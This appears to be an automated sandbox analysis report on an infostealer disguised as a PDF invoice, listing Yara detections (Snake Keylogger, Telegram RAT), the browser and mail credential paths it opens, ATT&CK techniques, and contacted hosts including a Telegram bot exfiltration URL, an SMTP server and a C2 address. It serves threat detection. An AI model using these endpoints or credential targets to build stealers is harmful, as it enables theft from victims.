                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4178805615.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vrhZELiHpiub.exe PID: 7364, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 8080, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vrhZELiHpiub.exe PID: 7364, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 8080, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vrhZELiHpiub.exe PID: 7364, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.vrhZELiHpiub.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3884ab0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Proforma Invoice_21-1541 And Packing List.pdf.exe.3841a90.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4178805615.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vrhZELiHpiub.exe PID: 7364, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job                		111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job                		13
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Email Collection                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS11
                Security Software Discovery                		Distributed Component Object Model1
                Input Capture                		1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp                		LSA Secrets1
                Process Discovery                		SSHKeylogging3
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture24
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1535758 Sample: Proforma Invoice_21-1541 An... Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 44 reallyfreegeoip.org 2->44 46 api.telegram.org 2->46 48 3 other IPs or domains 2->48 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus / Scanner detection for submitted sample 2->60 66 16 other signatures 2->66 8 Proforma Invoice_21-1541 And Packing List.pdf.exe 7 2->8         started        12 vrhZELiHpiub.exe 5 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 44->62 64 Uses the Telegram API (likely for C&C communication) 46->64 process4 file5 36 C:\Users\user\AppData\...\vrhZELiHpiub.exe, PE32 8->36 dropped 38 C:\Users\...\vrhZELiHpiub.exe:Zone.Identifier, ASCII 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmp5F82.tmp, XML 8->40 dropped 42 Proforma Invoice_2...ng List.pdf.exe.log, ASCII 8->42 dropped 68 Adds a directory exclusion to Windows Defender 8->68 70 Injects a PE file into a foreign processes 8->70 14 Proforma Invoice_21-1541 And Packing List.pdf.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        26 2 other processes 8->26 72 Antivirus detection for dropped file 12->72 74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 22 vrhZELiHpiub.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 50 api.telegram.org 149.154.167.220, 443, 49759, 49779 TELEGRAMRU United Kingdom 14->50 52 us2.smtp.mailhostbox.com 208.91.199.223, 49787, 49790, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->52 54 2 other IPs or domains 14->54 78 Loading BitLocker PowerShell Module 18->78 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 34 conhost.exe 24->34         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Proforma Invoice_21-1541 And Packing List.pdf.exe66%ReversingLabsByteCode-MSIL.Trojan.Remcos
                Proforma Invoice_21-1541 And Packing List.pdf.exe100%AviraHEUR/AGEN.1309880
                Proforma Invoice_21-1541 And Packing List.pdf.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe100%AviraHEUR/AGEN.1309880
                C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe66%ReversingLabsByteCode-MSIL.Trojan.Remcos

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.fontbureau.com/designersG0%URL Reputationsafe
                http://www.fontbureau.com/designers/?0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.fontbureau.com/designers?0%URL Reputationsafe
                http://www.tiro.com0%URL Reputationsafe
                http://www.fontbureau.com/designers0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                http://www.goodfont.co.kr0%URL Reputationsafe
                http://www.sajatypeworks.com0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.fonts.com0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.deDPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://www.sakkal.com0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                http://www.fontbureau.com0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                https://reallyfreegeoip.org0%URL Reputationsafe
                http://www.fontbureau.com/designers80%URL Reputationsafe
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                us2.smtp.mailhostbox.com
                		208.91.199.223
                		truetrue
                  		unknown
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		193.122.130.0
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2017/10/2024%20/%2007:24:17%0D%0ACountry%20Name:%20%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		unknown
                            https://reallyfreegeoip.org/xml/173.254.250.82false
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.sakkal.com51eProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1772870272.00000000051D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://www.fontbureau.com/designersGProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/?Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/bTheProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.orgProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.org/botProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://us2.smtp.mailhostbox.comProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.fontbureau.com/designers?Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.office.com/lBProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002D20000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.tiro.comProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designersProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039C7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003B44000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003952000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AF6000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A0000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EDA000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C13000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C88000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.goodfont.co.krProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://chrome.google.com/webstore?hl=envrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002CF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://varders.kozow.com:8081Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4175099476.0000000000433000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.sajatypeworks.comProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.typography.netDProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/cTheProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003BF5000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AFE000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000395A000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.000000000392D000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.00000000039A2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4185912052.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003BEE000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C63000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003DBD000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003C19000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://checkip.dyndns.org/qProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://chrome.google.com/webstore?hl=enlBProforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002CEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.galapagosdesign.com/DPleaseProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fonts.comProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sandoll.co.krProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1770439227.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000A.00000002.1812624704.000000000254A000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sakkal.comProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://reallyfreegeoip.org/xml/Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000009.00000002.4178805615.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.office.com/vrhZELiHpiub.exe, 0000000D.00000002.4179084969.0000000002D25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.apache.org/licenses/LICENSE-2.0Proforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.fontbureau.comProforma Invoice_21-1541 And Packing List.pdf.exe, 00000000.00000002.1773016780.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://go.micvrhZELiHpiub.exe, 0000000D.00000002.4185910922.0000000003EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
